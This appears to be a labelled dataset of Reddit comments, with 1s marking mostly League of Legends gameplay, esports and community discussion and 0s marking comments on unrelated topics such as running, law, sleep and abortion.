1	ive been with an ad carry ahri who was the only not premade ( meant that she wasnt raged at) and she destroyed all things. Its viable but because its not played people thinks its not. As proved by Gman ap traic mid deosnt do to badly but before som1 trolled him into doing that people wouldnt have played it. The community is bad and rage because they cant deal with anything that is new and they havent seen before. They need som1 like m5 to play it and win before in there mind its viable. If som1 plays it in a normal and does well then the other team is a " noob team" this is y the community is bad.
1	It goes without saying that it is "more complex that commonly perceived".  What I meant by "not that hard" was in a completely non-absolute scale. It's functionality of a large-scale system that serves millions of people, of course it's complex for any number of small, moderately experienced people.  However one needs to keep in mind it is a brand new feature so there is a pretty decent chance the code there is "cleaner" than in older, core aspects of the game. Given the resources and man-hours that a corporation like Riot has available it is simply my belief that it is a  worthy time investment . I never said it was easy or demanded it to be out next patch. I simply put it out there in case people in Riot forgot about it or thought it wasn't worth it.  I really don't see why I got downvoted due to not stating something already obvious. Every single discussion/request such as this is made with all those aforementioned arguments already in mind because it's a fundamental truth.
1	Well it's clear with the removal of DFG that everyone is tired of bullshit, one-shot champions.  I don't mind if veigar gets buffed if it turns out that these changes do indeed make him unplayable, but having that much damage without a single skillshot was bullshit (you use w when they're stunned...you could argue that his e was a weird skill shot but even if so that's still basically "get hit with veigar stun and die" for the opponent).  Seriously, fuck people that play these champions designed for 6 year olds.  I am personally a huge advocate of this change, even if it's too large a nerf and he needs a buff to compensate (I'd also be willing to listen to an argument for making the delay on E 0.5 s or something like that).
1	Brutalizer used to be not as good because it didn't have a good build path. The only thing that you could build it into was the youmuu's ghostblade, which is good, but not an item that everyone want. Some champs that might want that item is like nocturn or trundle, people who want high attack speed. But champions like talon, pantheon, zed don't really need ghostblade because they do mostly spell damage.   Now that brutalizer has another build path, the black cleaver, it suddenly became a really good item. 25 attack damage, 10 armor pen, and 10% cdr reduction is already really really good for 1337 gold, and you can probably build then on your 2nd time back. This item creates such a huge power spike for ad casters once that item is completed. People just never used it in the past because while it does give that early power spike, it falls off late game because ghostblade wast he only thing it could be built out of, but now that the new bc is in the game, it allows champs like pantheon, zed, talon to build the brutalizer into something that they actually need.   AP mids also have very similar item, the fiendish codex, which costs 1000 gold, gives 30 ap, 6 mana regen, and 10% cdr. While it costs less and give more ap than attack damage of a brutalizer, attack damage scales so much better on ad casters than ap does on ap casters. And not to mention the base stats for ad casters are usually much better so ap casters usually have invest more money into defenses than ad casters, which is also very stupid. Bc giving health makes ad casters a bit more tanky while getting more burst, which is also stupid.   All in all,
0	r/running and /r/advancedrunning here.  YOU FUCKING ROCK.  Despite what most people think, I've always considered a race harder when I'm slower.  Why you ask?  Because not only are you going at 110%, and your body has less conditioning so throws out less endorphin to counter-act the pain, and it takes you longer.
0	The problem with being conscious of "triggers" in daily life everything you post or say is that every single thing is a potential trigger, consider just fictional examples: the color yellow (from the game adaptation of I Have No Mouth, and I Must Scream), the song Singing in the Rain (A Clockwork Orange), the phrase "Niagara falls" (old vaudeville routine).   If you're posting about something commonly triggering like about rape or abuse sure, say "hey I'm going to talk about being molested here", but the problem with people being UPSET about lack of warnings is that literally anything could trigger anyone, and thinking that hard before saying anything lest someone be offended that you talked about a fat person without an anorexia trigger warning is exhausting and not really practical.
0	Sorry, dude(tte), you are wrong.  Federal jurisdiction is not conferred simply because a subject fled to another state after committing a grand larceny.  (Certain offenses may become a federal crime under those circumstances, such as kidnapping or bank robbery, because they have an interstate nexus.  Larceny does not.)  Depending on the circumstances, the warrant may be extraditable, meaning if the suspect were caught in another state, they would be returned to the original state to face  state  charges.   Furthermore, there would be no additional charges for fleeing unless the suspect had already been arrested and fled while on bail/pre-trial release.   Finally, under no circumstances would she go to a federal prison.  Ignoring the fact that there is no federal crime here, there is no room in federal prison.  In fact, the federal government contracts with state prisons to house many of their prisoners, particularly pre-trial.
0	For someone who wants to wait till marriage to have sex (or many/most people really), sex is an emotional act.  It's pretty difficult to change emotion with logical arguments.  (and actually trying to make logical appeals just shows you don't really understand where she's coming from and thus further ruin your chances)
1	Original article:   感謝各位朋友的支持！ 很難過的跟各位報告！lms明天的賽事我們將不出賽！ 往後是否繼續參與lms賽事我們將會於近日決定！ 感謝大家~這樣的酸民文化實在讓我心寒，也無支持電競的熱情了！ 相關活動依然會如期舉辦，包含鐵人盃賽事與女子隊徵選。   Translation:   Thanks for all your support!   We have some bad news for you all, we are not attending tomorrow's LMS matches.   We will decide if we want to continue participating in LMS in the future.   Thank you everyone~ These kind of 'salty fans' tradition is making me sad and making me lose my passion for e-sports!   Relevant activities shall continue, including the female-only tournament selection.
1	Your Fps is based on your computer, This is how it works. I used to have over 100 ping because of a new computer but after a while (3ish yrs to be exact) i started to get close to 10 fps with my video settings at high. The simple way to fix this is to put all ur video settings to low.
1	I find Live support to be extremley helpful, and I've used to a lot before. It just bring the company a step closer to the players and it makes it feel much more personal. So yes, I'd love to see Riot do this. But I also realize it's probably very expensive.
0	I get my 30-50 hours of work done in 40 hours a week, in private IT. My boss works 60+ hours and week, and is always pulling out his hair because he's too busy, because he takes on more jobs than he can perform in 60 hours. But when he can only squeeze in 40 hours of jobs in a week, he spends all the time he can scolding me for only working 40 hours and never putting in the extra effort.   Overtime for me isn't worth the headache of having to ask for reimbursement for overtime, or the cuts into my personal time. But my boss sees me as a lazy employee who doesn't want to put in the extra effort. Meanwhile, I'm as effective per hour worked as he is, even with his premium hourly rate. Some people only see what they want to see, and I'm certainly not going to bust my own balls to get him a fat paycheck. But I'll certainly work smart to make my position as effective as possible.   /rant.
1	What is more annoying is people feeling the need to post about a post they don't like being posted only to express how they disapprove of the original post.
1	I would tend to agree with what THESE people have said: there are no BEST, but there are some better than other. My personal mid choices are Gragas (game breaking aoe burst and ult, tanky, lots of sustain, and a BELLY FLOP). Morgana (CC out the ass, dat shield, passive sustain, amazing roamer, free lvl 6 kill if you are good). Zyra (STUPID damage. Like...wtf damage, great utility with her seeds, being able to ward for free is nice. FUN) Ryze (retarded damage, burst, aoe, tanky, and easy to play well). My last pick for mid is Elise. She isn't borderline OP like Morg or Ryze, and she builds weird, but once you figure her out, she is really strong, even though her teamfighting isn't as good as the others mentioned here, her roaming and midgame is silly.
1	I don't get why people feel entitled to kiss riots ass every time they do big shit.   I mean, they have a PBE server (probably more enviroments) where they should test and fix/find some bugs in a new patch, plus they're are a company and they're far from awesome imo.   They should have a QA team to assure that software + network is working fine before releasing patches, and do some heavy load and balance tests in that environment as well (it costs money, but they're not exactly poor).   They know this patch was buggy, still they patched in NA public server (why not revert to last stable patch, after seeing it was a bad idea?).   Do u want people to say <3 Riot, when they keep screwing the game over and over again.
1	If you are ganking a lane and the enemy flashes away (with 25% HP or more), you actually did a very succesful gank! He wasted a summoner spell, then DO NOT flash behind him to AA him once and then to back off cause the turret will shoot you...   I sometimes just walk mid with blitz to actually come and do nothing but I just force to flash the enemy with my presence. Stupid people will flash after him, pull him (you actually not pulled him, you 'dragged' yourself towards him) do one E and then need to back off.
0	High school freshman with ADHD here. I have taken medication since 2nd grade and it was not necessary at at all back then. If you go to private schools or want to go to magnet schools (you have to apply to those right? Or do they do the lottery. Have a number of public school friends but none to magnets) then start in 6th or 7th grade. It helps a lot if you need them. If you don't want the child to form a dependency don't give it to them unless they have school. I chose to not take them because I am not my full self on them (more reserved, hardly funny, and boring) so I never liked to take them unless I needed to. Besides what would they need to stay focused on on weekends or summer. I assume it is a common thing to always take them because my doctor asks about it every time I see him. Parents if you do this stop it. They do not need these meds in order to function. I'm sure the kid probably hates it too.
0	One sleep cycle is, on average, about 90 minutes. I believe there are four phases in a sleep cycle, each one deeper than the last. The deepest phase is REM (rapid eye movement), which happens in the middle of the cycle before you go through the cycles in reverse and come out of deep sleep. In the REM phase, you do your most vivid dreaming and your body literally paralyzes itself as it recuperates. Most people go through about 4-6 sleep cycles each night, which equates to about 6-9 hours of sleep.   I learned this fact like five years ago and it's changed my sleeping habits for the better. I find that if I get 7.5 or 9 hours of sleep I feel great! This is because I'm waking up during the lightest stage of a sleep cycle. It's how you'd naturally wake up without an alarm.   But if I wake up after 8 hours, I'm in the middle of a sleep cycle and likely in the REM phase, so I feel groggy and lethargic. This is because my body is actually paralyzed at that moment I wake up. Additionally, I can vividly remember my dreams when I wake up during this phase, since REM deep sleep involves the most active dreaming.   I have no idea why you hear 8 hours a night thrown around so often. I mean, obviously every person is different and your sleep cycles may be way off from 90 minutes, but 8 hours has never worked for me.
1	I know an employee of Riot is an extension of Riot, so you could technically blame Riot for introducing that mechanic, but I don't blame Riot generally. I go straight to the source.  FUCK  CertainlyT.   Every time that guy makes a champion, he does three things.   1) Overload the SHIT out of a kit.    I'm talking ridiculously loaded. If you could look at a champion's kit and assign values to everything they do based on how strong it is, let's say the average champion has X "kit power". CertainlyT's champions definitely hover somewhere between 1.5X and 2X "kit power". You could point at a single ability on one of his champions and break it down into 2-3 standard abilities on any other champion. CertainlyT simply puts too much into each ability.   2) Stuff random passives where they don't make sense/don't belong.    This kind of goes hand-in-hand with point 1, in that the reason behind these random passives is that he is trying too hard to put more and more into the kit. But every single one of his champions has some extra passive stat boost that doesn't make any sense, and has no interaction with the ability where it is located (bad design). Darius has bonus armor pen on his hook, Zyra has bonus CDR on her seed, Zed has bonus %AD on his shadow, Thresh had bonus on-hit damage on his hook (yes, it is on Flay now, but CertainlyT is only in control of their release state, so for the sake of analyzing his work, I am saying the damage is on his hook where CertainlyT left it), and Yasuo has bonus crit on his passive (yes, it IS his passive, but his Flow Shield makes much more sense as a champion passive, and the double crit really seems like the "extra" shit thrown on there)   3) Take an old ability, make it better in 6-7 ways, make it slightly worse in 1 way (if even that), and then usually add on an extra passive for good measure.    If you compare Darius ult to Cho ult, Thresh hook to Blitz hook, Yasuo windwall to sivir/nocturne spell shields, zyra snare to morgana/lux/brand/mundo/etc skillshot ccs, etc, you find that they are better in pretty much every way. CertainlyT really doesn't play by the rules.   Let's take the skillshot CC example. The rule that all other champions seem to abide by is that skillshot CCs hit one thing and then stop, allowing the opponent to hide behind minions. Previously, Lux's was the main exception, but it comes with limited extra. It can hit a second target (but only a second), and that second target receives half damage and half snare duration. Then came along CertainlyT with Zyra. Should her snare hit one thing and then stop? No. Should her snare hit two things and then stop, dealing half effect to the second? Hell no. How about it just hits ANY NUMBER OF THINGS, dealing full damage and duration to all of them? kthxbai.   Or for another example, look at the current topic: Windwall. When you compare it to spell shields, it's a fucking joke.   Duration: 1.5s (Spell Shield), 3.75s (Windwall)   Number of things blocked: 1 (Spell Shield), Infinite (Windwall)   What is blocked: Spells (Spell Shield), Spells+Autos+Baron (Windwall)   How many people are protected: 1 - the caster (Spell Shield), 5 - the whole team (Windwall)   And then the ONLY downside of Windwall compared to Spell Shield...   What do you get when blocking something: mana/attack speed (Spell Shield), nothing (Windwall)   So in addition to just being flat out better, hardly even comparable to the existing similar abilities, CertainlyT wasn't finished there. It wasn't enough just to be way better. It had to be way better........and then have a passive effect that is unrelated to the active (again, bad design. a passive portion of an ability should relate to the active either thematically, gameplay-wise, or both).
1	I have carried myself from depths of ~900 elo during season 2 all the way to 1318 right before the end of the season. When season 3 started i got placed Silver V. This season i have moved up to Silver II with the occasional troll in every ~20 games and have had a fair amount of people who just non-stop flame other teammates during games.   During the rise through Silver II to my promo to Silver I i won 6/7 games to get to 100 points. Two of those games were come from behind wins with the worst being behind by 12 kills(5-17) but ended up winning because my team didnt give up and the other team's fed Malph and Riven kept trying to fight our entire team and ended up throwing the game.   Those 7 games i had some semi toxic teammates but nothing terrible. My first game for Silver I promo i was matched with 2 Gold V's, 2 Silver I's and me. I have never played a more toxic game in my entire life. Worse than any game in the 900 elo range and whenever i play on a smurf with my friends who are still learning the game. Within 5 minutes of the game starting i had three of my teammates(both Golds and one of the Silver I's) bitching at each other calling them noobs and saying they suck, constantly talking in all chat to the other team about each other, stealing buffs, refusing to team fight, and just anything to be a cunt.   The very next game was the exact same thing. I didn't even get a fucking chance to win my promo even though in the second game i was winning my lane. My teammates had already "thrown" the game by berating one another incessantly since champ select.   Both games were surrendered at around 25 minutes 4-1, me being the no vote both times.   Fuck all this high school drama bullshit. I didn't deal with it 8 years ago and i certainly am not going to start caring about how much you think our jungle sucks or how much you get camped mid without wards while constantly pushing your lane so your jungler doesn't even have a chance.   /rant
0	Honestly, there are much worse people than Kony out there, and I feel like this campaign exaggerates the influence he has.  Granted, the stuff he has done is abominable and he most certainly should be tried by some kind of international court.   However, I think the most interesting part of this campaign is how they are going about it.  It's an entirely internet-based movement that is relying on social networking to spread awareness.  This kind of thing has been getting more common with things like the SOPA blackout, but I can't think of anything that had goals as high as this.   If this campaign is a success and Kony is captured, that's great.  It won't solve all of Africa's problems and won't be the end of child soldiers, and it probably won't even have that big of an impact.   But what I  hope  this campaign does is show people the power of grassroots movements and how the internet allows the unparalleled spreading of ideas instantaneously.  I hope it makes people understand how individuals can come together to accomplish insurmountable tasks.   I kinda got a little more "hopeless romantic" at the end than I wanted to, but oh well.
0	That's not karma dude. That's you trying harder, which shows results. Don't try and give credit to other things when  you  are the one who's responsible for making all those good things happen.
1	Why should I not play ranked if I see it as a pass time? It's a hobby for me. I don't take my hobby's seriously as if it were a real job- because I do them for fun. I play ranked for fun. I play ranked to see how I compare to other players. And I believe that is why most people play ranked.   How would you implement such a mechanism. If they don't climb out within x games, they should be booted? No, I disagree. Ranked systems exist within many competitive games, and many different players of different skills levels participate.  YOU LITERALLY CANNOT DO ANYTHING ABOUT THIS . If they are bad, they are bad. Why should they be excluded because they aren't good at a video game that has no bearing on anyone's life (except maybe high level LCS play, but that's a different story). You are the typical low ELO player. You believe that the reason you cannot climb is because of your team. You are too outward focused. You cannot change who you get matched with. You can only change your own plays. And that's what you should focus on- as I did. I used to think like you. Then I actually took a look at myself, and lo, now I'm within the top 12% of players in my server.
1	let them know they are in danger is from the warning emails they send out. In general however we humans react poorly to being told we are doing something wrong. Anger is the most common reaction and denial. So you go play another game and rage a little more. Then you get another alert. So you play another then you rage a little more. and so on. Its not correct for EVERYONE but it is the pattern for MOST. That is the problem. Note that I'm not saying it will turn everyone into ragers. I'm saying seeing the report will cause anger more than self reflection. Some might just stop playing all together some might troll some might go to customs and stop playing regulars.   I do not like the idea. I think a warning before tribunal is the absolute FURTHEST this kind of idea should go. Something like two reports before tribunal. But even then I've seen many cases on there with one or two games. Which seems very weird to me.
1	Well TSM is definitely favored I would say people aren't giving TIP enough credit. Rush has shown he has the potential to be one of the most dominant junglers in the NA LCS. I believe he can put more pressure on the map than Santorin. Also XWX is known for his farming abilities. I don't know how Bjerg vs XWX matchup has gone in the past off the top of my head, but I would imagine if TiP put XWX on a scaling champion and he just sits back and farms he can be just as big of menace in teamfights as Bjergson. In standard lanes Rush could pull pressure bottom lane (in the 2v2 lane) while XWX (theoretically) outfarms Bjergson. We also know that TSM tend to leave Dyrus out to dry, but this is mostly due to lane swaps and would not be the case quite as much in standard lanes. Part of the problem is that if TiP did this and pulled out a win TSM would likely respond by helping Dyrus out in the next game. Giving him more farm and jungle pressure. Also I feel TSM has the more skilled bot lane.
1	As a sound engineer I can tell you that complete soundproof areas are somewhat impossible, or extreemly pricey + takes a huge amount of space.
1	I agree. Shit after one game in solo queue with people I've never met or will deal with in the next game or later I can get frustrated and pissed.   Living together with the same group for so long and opening up to them, makes raging easier because your comfortable with who your around.   You don't rage at a new job because something went bad or you got to work overtime because your new and don't want to get fired.   Once you get comfortable around your co-workers you slowly progress into "Fuck this shit, why are you working so slow".   Then after awhile you feel your better at the job than everyone else and feel you can tell them what to do, even if your not the best. Which is where Regi is at right now. Messing up his job and telling everyone else what the problem is and how it's clearly not his fault.   Just think of it as a Ordinary Job, because it is.   Thing is in a normal job you have someone in power above you to tell you what the problem is and how to fix it, or to shut the fuck up and pay attention. Problem with a LoL team is they don't have that kind of Baby sitting by someone or the threat of losing their job.   edit:
1	Well to be honest, some may see this is selling Ahri short on her usual glass-cannon role. I on the other hand heavily disagree. A lot, ( and I mean A LOT ) of people tend to play "by the book" and that's all good for the most part, it's safe, not much variation between games etc etc.   BUT!   Building your champ in a way that fits your playstyle and still meets the need of your champion can work well too. Ahri as a tanky AP can work very well. People will innately expect her to be a champ that can be shot down in moments, in a teamfight or 2v2 (AP mids and Junglers) a build such as this can shatter an enemy's comfort zone.   For instance, I play Karthus and usually, I do a lot of damage but once the Late late game comes around, ADs usually take me out in moments. I've had some games where I completely deviated from my normal karthus build and went tank Karthus because I was tired of the problems I faced lategame. I picked Karthus appopriate items that addressed my needs and endgame was my teams tank, and highest Damager.   OF course though, some, none, or all of this may or may not apply depending on if you are a high level or low level, playing normals vs ranked.
1	A few tips:     Know that an ADC can get shut down at anytime (even if you are fed) if you do not have a team to back you up, unless you're a god Vayne or Draven or Tristana     If you want to solo carry, it's easiest to play a role outside of bot lane. Top, once fed, people can only stop you by 2v1ing. Mid, insane roam pressure, can snowball top or bot, siege top//bot, pressure objectives/buffs. Jungle, can snowball lanes or solo carry (ex. Trick2G's "Godyr").     Kills don't mean much unless you know what do with your time that your opponents are dead. If you just aced the enemy team and have 4 alive 20 minutes in, do you back and buy? Wrong, you take baron or dragon + buffs, while pushing out lanes and warding.     Spread your influence. Just because you are 15-3 does not mean you can push one lane to win (unless you top, maybe). Help your team mates with your lead/dmg/pressure.     Play to your team's comp. Thresh, Fizz, Shaco = catch comp. Ward, deny vision, get picks. Take objectives after 1 or 2 picks. Ori, Mundo, Lulu = hard engage team fight comp. So to increase chances of winning, DO NOT TEAM FIGHT that team. It is heavily reliant on the AoE of Ori, Lulu, and Mundo.     Know that as elo rises, it becomes harder to solo carry and becomes more of a team game, therefore, SHOTCALL. Help your team make decisions. If team ahead, force fights at dragon or at a buff. You guys should win if you don't mess up too much. If behind, get catches, capitalize on objectives while 4v5 or 3v5.         Know your role in the team. Are you an assassin? If you are, you shouldn't be going in first using your dmg on the tank. Are you an ADC, should you be on the front line? No. Are you a tank with TP that is up? Should you be with your team when you can abuse the split push TP? No. Are you a peel support or engage support, etc.     Hope that helps. Good luck   edit: If you're wondering what elo I am, I'm Platinum. Trying to get to Diamond. Just got to work on execution on these tips   edit:
0	This is a throwaway; I don't care about karma.  Been on this site for 3 years, and every time I try to bring up a dissenting opinion regarding abortion and women's reproductive rights, even though I try to be cordial and not bring up religion or moral based argument, I'm downvoted to hell with terrible responses about how I'm stupid and a misogynist and more.  So I'm doing this mainly to get a dialog going.   I'm not against women being in charge of the reproductive rights when the decision wasn't in their control (rape, incest), etc.  People are quick to tout the "but what about rape and incest you terrible monster!", but abortions in those instances only account for less than 1%.   I don't get how people don't see that sex, in its natural biological function, is meant for procreation.  Babies.  People act surprised when they get pregnant, like it's some big tragedy they had nothing to do with.  How the hell do you not know that you could get pregnant by having sex?  That's what sex, in its millions of years of evolution, is designed to do!   Even people who use the excuse that they used birth control I still don't understand.  Maybe if P/V were the only source of sexual relief, I could understand it better, but the human body has so many orifices, cavities, protrusions, and erogenous zones that there are dozens if not more ways to get your rocks off without having a penis inside a vagina.   BTW, if you think my meme is just about women's rights, you're mistaken.  I think if a guy doesn't want to knock up someone, he shouldn't have P/V sex, but it happens that the man's role/responsibility in abortions is severely downplayed, so I focused on women's reproductive rights.   Furthemore, I see people always fall back to the "so you want a poor woman to unwillingly have a kid, and probably resent it for the rest of its life and it'll be terrible blah blah", but few ever think of the third option besides keep or destroy: adoption.  There are SO MANY charitable organizations out there that will help a mother go through giving up a child for adoption, and this goes in the way of assistance with pregnancy costs, work time lost, doctor visits, etc.  There are more people looking to adopt in the US and Canada alone than there are children to adopt.
0	I am 5'11" 190 and my gf is 5'9 130 and very slender. I can almost fit in to her pants.
0	Went to see Lucy and The Purge 2 double feature at the drive-in. Halfway through The Purge a kid in a car near us starts making all kinds of noise, crying and shit.  Parents make meager attempts to quiet him.  Then about 4 or 5 times this happened, the radio in their car suddenly turns to a different station.  Mexican radio, talk radio, classical, country...must have been the kid.   Eventually we hear him crying more and saying "owww" (parents trying to quite him down again).  Yeah, this kids gonna grow up to be just fine.
0	I've seen a lot of people calling out this guy as some sort of "rip off" artist.  These people are ignorant of the real world.   He's buying something from someone.  If that person doesn't like the offer they can leave and go find another buyer.  He offers a price where he can double his money.  How is this different from any other retail operation?   Markup on retail specialty goods is usually over 100%.  This is how business works.  This is capitalism.   100% of people who make fun of this guy would agree with the phrase, "buy low, sell high".  If the seller doesn't like his price, they can take the time to find a buyer.  His service is finding that buyer and giving the seller instant money.   I understand people not liking the show, it is pretty contrived, but I think Rick (the guy pictured here) is smart as hell.  His kid is an entitled prick and the "old man" is kinda over the hill but still makes me smile and reminds me of my grandparents.   And when people claim there is no historical value?  They get a piece, an expert tells you the history of it, they talk price.  It is pretty much 'Antiques Roadshow' of PBS but dressed up a little for entertainment.
1	Those Titties Tough
1	You think Riot shouldn't let an organisation manage the situation so badly? What has Riot to do with this? Riot is the organisation that stages LCS, it's not their job to help the players get the infrastructure to train as good as they can. That's the responsibility of the team. After all Riot PAYS them.   Of course it is a shame, but in my opinion it is the people and players inside of Spain who should be more aware about this issue. If you are in a good team, just don't play for Giants! anymore. Other teams have shown that they managed to get into LCS without a sponsor (like Supa Hot Crew). If you have a gaming house in Germany and it is capable of having an Internet connection by cable you can have up to 100 Mbit for not even 50 € a months. They get paid 12.500 $ each for 3 months so they should be able to get around that issue.
0	Wow so many close-minded assholes in this thread. Stop saying that sociology isn't a real major, that he'll never find work or that medicine is the better career for OP regardless of what his interests/skills are. Just shut the hell up and let people pursue their passions. If you think that STEM majors are the only way for someone to have a good career then you're shockingly ignorant. We don't need legions of STEM students who hate their lives because they were pressured into it by dickwads.
0	what "laws" are they passing to limit what you "can or cant do" exactly???   Because it seems that Congress is deadlocked and it takes Two to Tango so not quite sure where these mysterious laws you're afraid actually are/have occurred?   Oh, here, allow me: At the moment, according to the Federal Register, there have only been 23 public laws enacted in the second session of the 113th Congress -- a number that virtually ensures that this Congress will pass the fewest number of laws of any in history. (It's hard to imagine that, in an election year, Congress is going to go on a law-passing spree.)
1	It is possible to get level 30 really quickly on a smurf account, I've been doing it myself the last 3 days, and already level 24, although... I did put double exp boosts into it and played 8+ hours a day on it... so i guess this is kind of moot...   Regardless, I actually did buy T2 runes on this smurf account, only because they are dirt cheap and actually aren't terrible, but not great either. It just helps with the leveling process if doing 3v3 bot rushes etc.   I do agree that Ip rewards are super low. If i play a normal game on my smurf account that I'm leveling, with double exp boosts i get almost 550 exp, but with single IP boosts, i only get maybe 150 ip max. 300 if first win of the day. Without the boost It'd be like 70-110 at best. So that's something that could be improved, but I'm not sure they will do that, since easier IP means easier champions, and easier champions means less profits from people buying RP for them. That being said, they "recently" reduced rune prices anyways, and i feel they are somewhat more reasonable compared to what they used to be.   I feel if runes were made too cheap, and if IP was made easier to get honestly, it would feel too easy as a game, and i highly doubt riot wants to make the game ridiculously easy.
1	Ali and Shen aren't as OP as people make them seem.   Same with Blitz. And Morg.   Even Malphite has his weaknesses.   Ez has a weak late game.   Eve is melee and easy to trade with / bully.   Rengar and Jayce balanced through numbers.   Zyra and Diana already nerfed.
0	Update: I went halfsies with a girl and we made $200 on video poker at the bar.  So $100 accounted for.   Update 2: Learned that my friend who drove got lucky last night; we had a full car going in last night and with the extra body we picked up I volunteered to stay behind and wait for a cab while they went ahead.  That left me alone at the bar.  Now, I know the bartender sorta well so I sent her a friend request,  whether or not she accepts it I'm still gonna message her  and find out if she saw anything.   Update 3: [Found the source of $100 number 2!]( Not that exciting I know but I still have yet to hear from the bartender and one more bill to go.   Update 4: Mystery solved.  As many have guessed it involves gambling, sorta.  So after leaving the bar and either before or after going to the diner I went to one of the casinos I used to work at.  I know this because a pit boss I used to work with just called and told me this story.  He looks up and sees me stumbling over to one of his Baccarat tables. Now, I've dealt to many of these players before and know them quite well.  One of my regulars looks up and asks me who I like on the next hand.  I squint at the board and say "banka" in a horrible asian accent.  Banker wins and they all look back at me to see what I think is next, "Banka!!!"  Banker wins again, a couple people give me some $5 checques.  I say "banka" again and at this point these guys have been pressing their bets for three hands now and a couple of them are betting over a thousand dollars on banker.  Banker hits!!! Now everyone's really excited at the run, more players hand me checques a couple give $25's.  All of the players are now turned around and staring as I "contemplate" the board.  My friend the Pit says at this point I raise both hands up in the air and yell "BANKA!!!!!!!"  Player wins, natural 9.  He tells me I didn't even react, everyone loses and I walk away with the checques that will soon become the third hundred dollar bill plus a couple of fives.
1	While I admit that my post-laning Vel'koz is a bit subpar, I've found Vel'koz to be extremely deadly in lane as you can often harass and cs at the same time with a well-timed w, e, or q and q+e makes you VERY difficult to gank. Honeslty, having played midlane against bronze 5's in normals, Bronze I all the way up to Silver I in S3, and Bronze 3 to Silver 5 in S4, I would say that most low elo midlaners are god awful at csing (I can be under constant harassment and zoning, rarely able to get in range to even attempt a last-hit which I will gladly admit I'm iffy at until around level 4-5, and still manage to easily out cs my opponent if they're not at least firmly low silver) and, well, until you hit low-silver they will just generally focus a lot more on trading skills (and generally being low on mana) with the enemy laner while trying to avoid enemy harass, but be vulnerable to early ganks, proper trading and consideration of creep mechanics and manipulation.   In other words: if you can last hit, get jungle pressure, or properly time your all-in you should be able to win lane pretty easily. With vel'koz, you honestly just need to know when to all-in. Hell, I've been killed by a vel'koz in lane simply because of a ping/lag spike letting him get a full combo off blowing me from nearly full health (I'd been dodging his skill shots and letting him take the free creep damage while mainly focusing on my own cs up until this point) to dead in the time it took my ping to come back down to normal (it really only takes, what, a second or so to get off a full combo and you can get a knock-up and slow in with that as well plus any ignites or AA's you need to finish). I love playing Vel'koz, but even as someone who'd already gotten in maybe 5 games with him by that point I was amazed by his ability to get down a little burst and with his relatively good mana regen versus mana usage it really just comes down to making sure you group and don't get targeted by any assassins or at least use a Zhonya's/have your team ready to peel as Vel'koz is very powerful if he can actually survive to get his damage off.
1	There are a couple of differences between zephyr and BotRK. 1) Attack speed 2) life steal 3) movement speed 4) cooldown reduction 5) passives.   Zephyr gives more attack speed and cdr. It also gives tenacity which helps with the amount of both hard and soft CC the enemy comp had. BotRK gives you life steal and a passive that is very effective against tanks. The enemy team did not have a very tanky member like shyv or renekton so BotRK was not a favorable pickup.
1	Just a few names I feel deserve mention in this thread at least; They have potential to be extremely powerful, particularly given the presence of certain teammates or the absence of certain enemies.   Vladimir. Exceptional farming ability, extremely difficult to gank, and a stat conversion passive all give Vladimir the tools to become a true monster of the late game. While his earliest levels are a little bit weak (1-3 feels a little bit awkward most of the time), as soon as you hit 6, you become a monster. Trading with Vlad is almost impossible, since he sustains so well, and this can enable you to force your lane opponent back, since very few mids are able to keep up with this. A well placed Vlad ult almost guarantees success in a teamfight.   Galio. Exceptionally high damage at level 1 and an early ability to blow up creep waves are both valuable traits in a mid lane champion. Add to this his shield, which also gives him damage and sustain, and his speed boost (which acts like an early shurelya's reverie, except spammable)  and you have great tankiness and mobility from a fairly early point in the game. His passive is what puts him over the top though. The ability to gain additional stats from items that are valuable to you in lane already makes Galio a powerful mid laner. That said, he does have issues with certain champions like udyr who can instantly cancel his ultimate even if it hits them.   Malphite. Yep. Mid Lane Malphite is actually pretty scary. His burst damage is easy to underestimate because people simply don't expect malphite to 100-0 them (quite possible with any kind of gank; there's a certain similarity to Warwick Ult). Malphite also has the ability to just disappear for a few seconds, then ult someone in another lane and kill them. If the enemy team is running a champion besides their ad carry that relies on attack speed, Malphite becomes a very strong pick. (He's also great fun against talon :P)   And last, but not least:   Cho'Gath. He has excellent ap scaling that often goes overlooked, with a 1.0 ratio on his q, .7 ratios on his w and r, and .3 ratio on his e which procs on every autoattack. His ability to followup allied crowd control is outstanding, and he always has the option of building tanky and relying on his naturally high magic damage. What really sets him apart is his huge true damage nuke, which with max cdr, can be up twice during a prolonged teamfight. At max rank it does 650 true damage all on its own, and with ability power, that number can easily rise over 800.
1	This is not a matter of MLG sucking.  It's a matter of a shifting dynamic of who views their streams.  I have been going to MLG Raleigh for the past 3 years and the growth of League of Legends compared to SC2 has been astounding.  The problem is with the speed at which fans expect a shift in they dynamic.  The viewership being in the overwhelming majority for League of Legends over SC2 is a very new thing (within the last few months) for MLG.  Its viewership has in the recent past been dominated with SC2 patrons and before that it was FPS games.  Even in August at MLG Raleigh there was a similarly sized group of people watching SC2 as there were watching League of Legends.  The company needs time to shift what it is providing to what the viewers want.  If things stay the way they are as far as viewer count (which they most likely will) MLG will most definitely be providing a second LoL stream in the very near future.  The 15 bucks has never even been worth it for SC2 so I understand where you're coming from on that :P
0	Life is 10% what happens to you, and 90% how you react to it.  Many others still took that bullying and used it to make themselves a better person.  Or they found ways to create distance from that person in their lives.  I know I either distanced myself from such people (quit baseball as a teenager, despite being fairly decent at it) or I stood my ground and fought them, through words or actions.  I am now a better person today, and in a way, I have some of these people to thank for it.   I know that there are unavoidable people and situations, and some very fucked up stuff can happen out of your control, but also remember that these bullies are usually kids.  They grow up, they change, they become different people.   I'm not sure if it's worse to hope that OP's friend is still very young and didn't have the chance to change... because I'd imagine this person became quite a different human being after high school.  I'll give OP the benefit of the doubt I suppose and say this is a few years removed  and  the person was still shitty.
1	I'm expecting Own3d.tv to be out of buisness pretty soon. A LARGE majority of their streamers are now on twitch. The Rain Man, Destiny, Phantomlord, Guardsmanbob (as of today) and CLG.EU. Currently on the own3d.tv homepage the totals for all the streams is around 12k. Right now on twitch the two highest viewed streamers are both ABOVE 12k. (Froggen at 27k, TotalBiscuit at 12,600).   It's sad to see the website slowly dying. Although there's a lot of things own3d failed with. Such as late payments (Which caused TSM to switch in the first place) and destiny to even leave his contract early just so he can move to twitch and actually get paid. [You can read more about that here:  ] It's pretty sad since I used to always check own3d for my League streams and stayed almost exclusively on twitch for SC2 streams. Now there's almost no reason for me to even visit own3d once CLG makes the switch.
